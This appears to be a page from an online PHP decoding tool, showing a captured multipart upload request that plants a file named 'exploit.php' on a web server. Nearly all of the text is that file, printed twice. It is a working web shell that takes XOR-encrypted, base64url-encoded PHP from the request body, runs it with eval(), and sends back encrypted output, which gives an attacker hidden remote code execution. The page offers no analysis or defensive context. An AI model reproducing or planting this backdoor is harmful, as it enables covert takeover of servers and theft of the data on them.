Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

100000 --e327fd0889aec0ba21925b0b3425b018 Content-Disposition: form-data; name="upload..

Decoded Output download

 
100000 
--e327fd0889aec0ba21925b0b3425b018 
Content-Disposition: form-data; name="uploaded" 
 
exploit.php 
--e327fd0889aec0ba21925b0b3425b018 
Content-Disposition: form-data; name="Upload" 
 
Upload 
--e327fd0889aec0ba21925b0b3425b018 
Content-Disposition: form-data; name="uploaded"; filename="exploit.php" 
 
<?php 
function base64url_encode($data) { 
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); 
} 
 
function base64url_decode($data) { 
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT)); 
}  
function x($k, $p){ 
		$c = ""; 
		$l = strlen($k); 
		$pl = strlen($p); 
		for($i = 0; $i < $pl; $i++) { 
			$c .= $k[$i % $l] ^ $p[$i]; 
		} 
		return $c; 
} 
$k = '647b9ff0267e0ba4'; 
$content = file_get_contents("php://input"); 
$split = explode("=", $content); 
if (strcmp(base64url_decode($split[0]),'s3p3hr')) { 
$decoded = base64url_decode($split[1]); 
		$decrypted = x($k,$decoded); 
		ob_start(); 
		try { 
			eval($decrypted); 
		} 
		catch (exception $e) { 
			print($e->getMessage()); 
		} 
		$o = ob_get_contents(); 
		$c = x($k, $o); 
		$e = base64url_encode($c); 
		ob_end_clean(); 
		print($e . "
"); 
} 
?> 
 
--e327fd0889aec0ba21925b0b3425b018--

Did this file decode correctly?

Original Code


100000
--e327fd0889aec0ba21925b0b3425b018
Content-Disposition: form-data; name="uploaded"

exploit.php
--e327fd0889aec0ba21925b0b3425b018
Content-Disposition: form-data; name="Upload"

Upload
--e327fd0889aec0ba21925b0b3425b018
Content-Disposition: form-data; name="uploaded"; filename="exploit.php"

<?php
function base64url_encode($data) {
  return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64url_decode($data) {
  return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));
} 
function x($k, $p){
		$c = "";
		$l = strlen($k);
		$pl = strlen($p);
		for($i = 0; $i < $pl; $i++) {
			$c .= $k[$i % $l] ^ $p[$i];
		}
		return $c;
}
$k = '647b9ff0267e0ba4';
$content = file_get_contents("php://input");
$split = explode("=", $content);
if (strcmp(base64url_decode($split[0]),'s3p3hr')) {
$decoded = base64url_decode($split[1]);
		$decrypted = x($k,$decoded);
		ob_start();
		try {
			eval($decrypted);
		}
		catch (exception $e) {
			print($e->getMessage());
		}
		$o = ob_get_contents();
		$c = x($k, $o);
		$e = base64url_encode($c);
		ob_end_clean();
		print($e . "\n");
}
?>

--e327fd0889aec0ba21925b0b3425b018--

Function Calls

explode 1
file_get_contents 1

Variables

$k 647b9ff0267e0ba4
$split None
$content

Stats

MD5 5db8341ea2e9f075172b8c4d093a3b20
Eval Count 0
Decode Time 303 ms